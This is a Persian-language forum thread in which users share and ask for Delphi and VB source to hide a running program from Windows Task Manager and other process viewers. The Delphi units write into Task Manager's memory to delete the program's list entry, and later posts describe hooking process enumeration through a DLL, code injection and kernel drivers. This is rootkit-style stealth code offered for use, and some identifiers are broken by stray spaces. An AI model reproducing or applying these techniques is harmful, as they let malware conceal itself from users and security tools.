دوستان لطفا" جهت انجام اینکار هرکی هر سورسی داره دریغ نکنه.

تو تاپيكهاي من جستجو كن به صورت كامل روش را به وسيله lviinjection توضيح دادم

بيا اين هم سورسش :



unit lviinjection;

interface
uses
classes,windows,messages,commctrl,sysutils;

procedure lviw32injection(h:hwnd;item:string);

implementation

procedure lviw32injection(h:hwnd;item:string);
var
handle:thandle;
lvi:TLVFindInfo;
p:pointer;
pid:dword;
i:integer;
w:cardinal;
begin
GetWindowThreadProcessId(h,pid);
handle:=OpenProcess(PROCESS_ALL_ACCESS,FALSE,pid);
p:=virtualallocex(handle,nil,sizeof(lvi),MEM_COMMI T,PAGE_READWRITE);
lvi.psz:=virtualallocex(handle,nil,sizeof(item),ME M_COMMIT,PAGE_READWRITE);
lvi.flags:=LVFI_STRING;
writeprocessmemory(handle,lvi.psz,pchar(item),leng th(item),w);
writeprocessmemory(handle,p,@lvi,sizeof(lvi),w);
i:= SendMessage(h, LVM_FINDITEM, WPARAM(-1), LPARAM(p));
ListView_DeleteItem(h,i);
VirtualFreeEx(handle,Lvi.psz, 0, MEM_RELEASE);
VirtualFreeEx(handle, p, 0, MEM_RELEASE);
end;
end.


اين هم نحوه استفاده :



unit Unit4;

interface

uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs,lviinjection, ExtCtrls,commctrl;

type
TForm1 = class(TForm)
Timer1: TTimer;
procedure Timer1Timer(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;

var
Form1: TForm1;

implementation

{$R *.dfm}

procedure TForm1.Timer1Timer(Sender: TObject);
var
h:hwnd;
s:string;
begin
s:=extractfilename(application.ExeName);
h:= FindWindow(WC_DIALOG, 'Windows Task Manager');
h:= FindWindowEx(h, 0, WC_DIALOG, '');
h:= FindWindowEx(h, 0, WC_LISTVIEW, 'Processes');
if (h <> 0) then
begin
//killtimer(h,0);
lviinjection.lviw32injection(h,s);
end;
end;
end.



حالا حالشو ببر

لطفاً با پروژه های ویبی این سورسارو برام بزارین ممنون میشم .....

لطفاً با پروژه های ویبی این سورسارو برام بزارین ممنون میشم .....



عزیز دل برادر اینم هدیه من به شما :لبخند:

من اين سورس وي بي را كه اجرا مي كنم سريع مك آفي دخلشو مياره و ميگه ويروسه

این کدی که برای دلفی گذاشتین رو میشه به صورت پروژه اپلود کنید ؟

من خیلی وقته دلفی رو ولش کردم اگه به صورت سورس در پروژه بزارید بهتر میشه روش کار کرد ...

ممنون :)

این کد دلفی جز مخفی کردن از تسک منجر کارهای دیگه هم میکنه مخفی کردن برنامه از اکسپلورر و مخفی کردن کد از regedit و msconfig شما با این کد میتونین هر چیزی رو از داخل یک shelllistview حذف کنین

آقایون لطفا" یک سورسی رو بدید که هیچ process Explorer نتونه فایلو نمایش بده.
منظورم یه چیزی شبیه به برنامه HideToolz یا Process Hider میباشد.

كار ساده اي نيست ولي سعي مي كنم بررسي كنم . فكر كنم يه جايي ديدم

اگه میخواهین هیچ پروسس اکسپلورری نشون نده یه روشش اینه که از hookapi استفاده کنین یا با یه injection برنامتونو به یه پروسه در حال اجرا تزریق کنین

سلام دوستان:
پس از کلی تلاش تونستم چند تا سورس کد تهیه کنم و به مرحله اجرا برسونم این سورسها رو بگیریدو
حالشو ببرید.

برادر گرامی من مثالهای شما رو نگاه کردم ، برنامه های شما هر جوری هم تو لیست پروسه مخفی بشه توسط Anti Rootkit ها پیدا می شه ، چون کار این برنامه ها در واقع پیدا کردن پروسه های مخفی هستش.

سلام:
خوشحالم که بررسی میکنید.
اگه دوستان راه حلهای بهتری دارن Open Source بذارن حالشو ببریم.

اینم از سورس من :لبخند::لبخند:

{‌ بی خیال مخفی کردن پروسه ها شو ، چون تقریبا" راهی نداری که بتونی با یه پروسه مخفی هر کاری که دلت می خواد انجام بدی }

اینم از سورس من :لبخند::لبخند:

پس سورس كدهات كجاست

من يك تغييري كوچكي در يكي از Dll ها دادم باعث شد كه حتي Process Finerها نتواند ليست پروسس ها را نيز بدست آورند .

براي اعمال اين كار به روش زير عمل كنيد :
به جاي اين خط

if lstrcmpiw(Info^.ProcessName.Buffer,'Project1.exe') = 0 thenاين رو بگذاريد :

توي Var اين فانكشن هم اينو حتما بنويسيد :


Dest: PWideChar;
DestSize: Integer;



if lstrcmpiw(Info^.ProcessName.Buffer, StringToWideChar(ExtractFileName(Application.ExeNa me),Dest,DestSize)) = 0 then
و در قسمت Uses ها هم


uses
Windows,sysutils,Forms,
NativeAPI;به اين صورت باشد .

حالا حال كامل ببريد

آخ شرمنده ، یادم رفت ضمیمه کنم :لبخند:
پاکشون کردم ، صبر کن دوباره بنویسم ، آپلود می کنم. ببخشید

سلام دوستان:
پس از کلی تلاش تونستم چند تا سورس کد تهیه کنم و به مرحله اجرا برسونم این سورسها رو بگیریدو
حالشو ببرید.
ممنون.میشه یه توضیحی درباره ی این فایلها عنایت بفرمایید.
مثلا من میخوام پروسه ی Explorer.exe رو مخفی کنم چیکار باید بکنم؟:متفکر:

سلام.
من فایلارو دانلود کردم.اما نمی خوام اینترفیس داشته باشه.
می خوام از طریق خط فرمان دستورم رو بگیره و پروسه رو مخفی کنه یا از طریق دیگری مثله خوندن یه مقدار از رجیستری.البته میخوام خودش هم بعد از انجام عملیات بسته شه.
پروژه هم نمی خوام همون فایل کافیه!
خواهشا کمک کنید خیلی ضروریه.خیلی ...:افسرده:

سلام

بهتر بود که اول می گفتید که با دستور app.taskvisible=false ميشه برنامه رو از applicationسربرگ taskmanager مخفي كرد ولي از سربرگ process نه.

شروع به بحث در مورد نحوه بستن از منوی process می کردید

www.smsc.blogfa.com (http://www.smsc.blogfa.com) , www.222sms.com (http://www.222sms.com) برای دانلود رایگان نرم افزار ارسال پیامک

با سلام
بهترين روش واسه مخفي كردن پروسس استفاده از Ring0 هستش
شما روي درايور ميتوني خوب مانور بدين
البته به گفته دوست عزيزمون تمامي Anti Rootkit ها قابليت شناسايي پروسس هاي مخفي رو دارند
يا علي